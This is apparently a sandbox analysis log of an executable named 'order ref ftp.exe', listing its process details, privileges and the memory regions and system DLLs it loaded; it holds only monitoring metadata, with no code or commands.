# Flog Txt Version 1 # Analyzer Version: 2.4.0 # Analyzer Build Date: Jul 24 2018 18:08:56 # Log Creation Date: 16.10.2018 10:55:30.558 Process: id = "1" image_name = "order ref ftp.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.exe" page_root = "0x16fed000" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0xd10000 end_va = 0xd9ffff entry_point = 0xd10000 region_type = mapped_file name = "order ref ftp.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.exe") Region: id = 2 start_va = 0xda0000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 3 start_va = 0xdc0000 end_va = 0xdc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 4 start_va = 0xdd0000 end_va = 0xde3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 5 start_va = 0xdf0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 6 start_va = 0xe30000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 7 start_va = 0xf30000 end_va = 0xf33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 8 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 9 start_va = 0xf50000 end_va = 0xf51fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 10 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7f6a0000 end_va = 0x7f6c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6a0000" filename = "" Region: id = 12 start_va = 0x7f6c9000 end_va = 0x7f6c9fff entry_point = 0x0 region_type = private name = "private_0x000000007f6c9000" filename = "" Region: id = 13 start_va = 0x7f6cc000 end_va = 0x7f6cefff entry_point = 0x0 region_type = private name = "private_0x000000007f6cc000" filename = "" Region: id = 14 start_va = 0x7f6cf000 end_va = 0x7f6cffff entry_point = 0x0 region_type = private name = "private_0x000000007f6cf000" filename = "" Region: id = 15 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 16 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 17 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 165 start_va = 0x1110000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 166 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 167 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 168 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 169 start_va = 0x1230000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 170 start_va = 0x74890000 end_va = 0x748e8fff entry_point = 0x74890000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 171 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 172 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 173 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 174 start_va = 0xf60000 end_va = 0x101dfff entry_point = 0xf60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 175 start_va = 0x1440000 end_va = 0x144ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 176 start_va = 0x74990000 end_va = 0x74a20fff entry_point = 0x74990000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 177 start_va = 0x7f5a0000 end_va = 0x7f69ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5a0000" filename = "" Region: id = 178 start_va = 0xdb0000 end_va = 0xdb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 179 start_va = 0x1020000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 180 start_va = 0x1120000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 181 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 182 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 183 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 184 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 185 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 186 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 187 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 188 start_va = 0x7f6c6000 end_va = 0x7f6c8fff entry_point = 0x0 region_type = private name = "private_0x000000007f6c6000" filename = "" Region: id = 189 start_va = 0x15b0000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x00000000015b0000" filename = "" Region: id = 190 start_va = 0x74810000 end_va = 0x74887fff entry_point = 0x74810000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 191 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 192 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 193 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 194 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 195 start_va = 0x15c0000 end_va = 0x1747fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 196 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 197 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 198 start_va = 0xdc0000 end_va = 0xdc0fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 199 start_va = 0x1060000 end_va = 0x1060fff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 200 start_va = 0x1750000 end_va = 0x18d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 201 start_va = 0x18e0000 end_va = 0x2cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018e0000" filename = "" Region: id = 202 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 203 start_va = 0x74800000 end_va = 0x74807fff entry_point = 0x74800000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 204 start_va = 0x1070000 end_va = 0x1070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 205 start_va = 0x2e70000 end_va = 0x2e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 206 start_va = 0x741b0000 end_va = 0x7424afff entry_point = 0x741b0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9185_none_d0905a48442809b8\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9185_none_d0905a48442809b8\\msvcr80.dll") Region: id = 207 start_va = 0x74250000 end_va = 0x747fffff entry_point = 0x74250000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 208 start_va = 0x1080000 end_va = 0x1080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 209 start_va = 0x1090000 end_va = 0x1090fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 210 start_va = 0x10a0000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 211 start_va = 0x10b0000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 212 start_va = 0x10c0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 213 start_va = 0x10d0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 214 start_va = 0x10e0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 215 start_va = 0x10f0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 216 start_va = 0x1330000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 217 start_va = 0x1450000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 218 start_va = 0x1580000 end_va = 0x158ffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 219 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 220 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 221 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 222 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 223 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 224 start_va = 0x7f6c3000 end_va = 0x7f6c5fff entry_point = 0x0 region_type = private name = "private_0x000000007f6c3000" filename = "" Region: id = 227 start_va = 0x1100000 end_va = 0x1100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 228 start_va = 0x1370000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 229 start_va = 0x2ce0000 end_va = 0x2d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 230 start_va = 0x2d20000 end_va = 0x2e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 231 start_va = 0x2e80000 end_va = 0x31b6fff entry_point = 0x2e80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 232 start_va = 0x31c0000 end_va = 0x51bffff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 233 start_va = 0x736b0000 end_va = 0x741a9fff entry_point = 0x736b0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\f87e9c65bcfc0dde0655ce19fb05fe8c\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\f87e9c65bcfc0dde0655ce19fb05fe8c\\mscorlib.ni.dll") Region: id = 234 start_va = 0x76f30000 end_va = 0x77019fff entry_point = 0x76f30000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 235 start_va = 0x7f59d000 end_va = 0x7f59ffff entry_point = 0x0 region_type = private name = "private_0x000000007f59d000" filename = "" Region: id = 236 start_va = 0x74910000 end_va = 0x74984fff entry_point = 0x74910000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 237 start_va = 0x51c0000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 238 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 239 start_va = 0x1410000 end_va = 0x1412fff entry_point = 0x1410000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls") Region: id = 240 start_va = 0x1420000 end_va = 0x1420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 241 start_va = 0x73650000 end_va = 0x736aafff entry_point = 0x73650000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 242 start_va = 0x1430000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 243 start_va = 0x1550000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 244 start_va = 0x1370000 end_va = 0x13e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 245 start_va = 0x51c0000 end_va = 0x52effff entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 246 start_va = 0x5390000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 247 start_va = 0x53a0000 end_va = 0x639ffff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 248 start_va = 0x63a0000 end_va = 0x739ffff entry_point = 0x0 region_type = private name = "private_0x00000000063a0000" filename = "" Region: id = 249 start_va = 0x73a0000 end_va = 0x75effff entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 250 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 251 start_va = 0x2e20000 end_va = 0x2e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 252 start_va = 0x52f0000 end_va = 0x532ffff entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 253 start_va = 0x75f0000 end_va = 0x76effff entry_point = 0x0 region_type = private name = "private_0x00000000075f0000" filename = "" Region: id = 254 start_va = 0x76f0000 end_va = 0x77effff entry_point = 0x0 region_type = private name = "private_0x00000000076f0000" filename = "" Region: id = 255 start_va = 0x71ca0000 end_va = 0x7287ffff entry_point = 0x71ca0000 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Windows.Forms\\e3f653c6d321c4c528daa164908e0ff8\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.windows.forms\\e3f653c6d321c4c528daa164908e0ff8\\system.windows.forms.ni.dll") Region: id = 256 start_va = 0x72880000 end_va = 0x73022fff entry_point = 0x72880000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\b0de8183f9e33cd0fbe10c8db1402653\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\b0de8183f9e33cd0fbe10c8db1402653\\system.ni.dll") Region: id = 257 start_va = 0x734c0000 end_va = 0x73648fff entry_point = 0x734c0000 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Drawing\\cebfffe6cee14413d504056227f496b2\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.drawing\\cebfffe6cee14413d504056227f496b2\\system.drawing.ni.dll") Region: id = 258 start_va = 0x7f597000 end_va = 0x7f599fff entry_point = 0x0 region_type = private name = "private_0x000000007f597000" filename = "" Region: id = 259 start_va = 0x7f59a000 end_va = 0x7f59cfff entry_point = 0x0 region_type = private name = "private_0x000000007f59a000" filename = "" Region: id = 260 start_va = 0x1400000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 261 start_va = 0x73310000 end_va = 0x734b4fff entry_point = 0x73310000 region_type = mapped_file name = "microsoft.visualbasic.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.VisualBas#\\daf407adee4c100cc714ef63f3b1b9c3\\Microsoft.VisualBasic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.visualbas#\\daf407adee4c100cc714ef63f3b1b9c3\\microsoft.visualbasic.ni.dll") Region: id = 262 start_va = 0x732d0000 end_va = 0x732eafff entry_point = 0x732d0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 263 start_va = 0x732f0000 end_va = 0x73302fff entry_point = 0x732f0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 264 start_va = 0x732a0000 end_va = 0x732cefff entry_point = 0x732a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 265 start_va = 0x73190000 end_va = 0x73293fff entry_point = 0x73190000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\dc469620ee7f5d9d576c86f998ca129a\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\dc469620ee7f5d9d576c86f998ca129a\\system.management.ni.dll") Region: id = 266 start_va = 0x1400000 end_va = 0x1400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001400000" filename = "" Region: id = 267 start_va = 0x5330000 end_va = 0x536ffff entry_point = 0x0 region_type = private name = "private_0x0000000005330000" filename = "" Region: id = 268 start_va = 0x77f0000 end_va = 0x78effff entry_point = 0x0 region_type = private name = "private_0x00000000077f0000" filename = "" Region: id = 269 start_va = 0x78f0000 end_va = 0x792ffff entry_point = 0x0 region_type = private name = "private_0x00000000078f0000" filename = "" Region: id = 270 start_va = 0x7930000 end_va = 0x7a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000007930000" filename = "" Region: id = 271 start_va = 0x7f530000 end_va = 0x7f53ffff entry_point = 0x0 region_type = private name = "private_0x000000007f530000" filename = "" Region: id = 272 start_va = 0x7f540000 end_va = 0x7f58ffff entry_point = 0x0 region_type = private name = "private_0x000000007f540000" filename = "" Region: id = 273 start_va = 0x7f591000 end_va = 0x7f593fff entry_point = 0x0 region_type = private name = "private_0x000000007f591000" filename = "" Region: id = 274 start_va = 0x7f594000 end_va = 0x7f596fff entry_point = 0x0 region_type = private name = "private_0x000000007f594000" filename = "" Region: id = 275 start_va = 0x77670000 end_va = 0x776f1fff entry_point = 0x77670000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 276 start_va = 0x1560000 end_va = 0x1560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001560000" filename = "" Region: id = 277 start_va = 0x7a30000 end_va = 0x7a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000007a30000" filename = "" Region: id = 278 start_va = 0x7a70000 end_va = 0x7b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000007a70000" filename = "" Region: id = 279 start_va = 0x7b70000 end_va = 0x7baffff entry_point = 0x0 region_type = private name = "private_0x0000000007b70000" filename = "" Region: id = 280 start_va = 0x7bb0000 end_va = 0x7caffff entry_point = 0x0 region_type = private name = "private_0x0000000007bb0000" filename = "" Region: id = 281 start_va = 0x7f52a000 end_va = 0x7f52cfff entry_point = 0x0 region_type = private name = "private_0x000000007f52a000" filename = "" Region: id = 282 start_va = 0x7f52d000 end_va = 0x7f52ffff entry_point = 0x0 region_type = private name = "private_0x000000007f52d000" filename = "" Region: id = 283 start_va = 0x73170000 end_va = 0x7318dfff entry_point = 0x73170000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 284 start_va = 0x76ce0000 end_va = 0x76d71fff entry_point = 0x76ce0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 285 start_va = 0x71c30000 end_va = 0x71c95fff entry_point = 0x71c30000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 286 start_va = 0x76ed0000 end_va = 0x76f2bfff entry_point = 0x76ed0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 287 start_va = 0x74ac0000 end_va = 0x74ac6fff entry_point = 0x74ac0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 288 start_va = 0x7cb0000 end_va = 0x7ceffff entry_point = 0x0 region_type = private name = "private_0x0000000007cb0000" filename = "" Region: id = 289 start_va = 0x7cf0000 end_va = 0x7deffff entry_point = 0x0 region_type = private name = "private_0x0000000007cf0000" filename = "" Region: id = 290 start_va = 0x73160000 end_va = 0x7316cfff entry_point = 0x73160000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 291 start_va = 0x7f527000 end_va = 0x7f529fff entry_point = 0x0 region_type = private name = "private_0x000000007f527000" filename = "" Region: id = 292 start_va = 0x1570000 end_va = 0x1574fff entry_point = 0x1570000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 293 start_va = 0x7df0000 end_va = 0x7e30fff entry_point = 0x7df0000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 294 start_va = 0x73150000 end_va = 0x73158fff entry_point = 0x73150000 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\wminet_utils.dll") Region: id = 295 start_va = 0x1590000 end_va = 0x1590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001590000" filename = "" Region: id = 296 start_va = 0x15a0000 end_va = 0x15affff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 297 start_va = 0x73130000 end_va = 0x73140fff entry_point = 0x73130000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 866 start_va = 0x71b70000 end_va = 0x71c2bfff entry_point = 0x71b70000 region_type = mapped_file name = "fastprox.dll" filename = 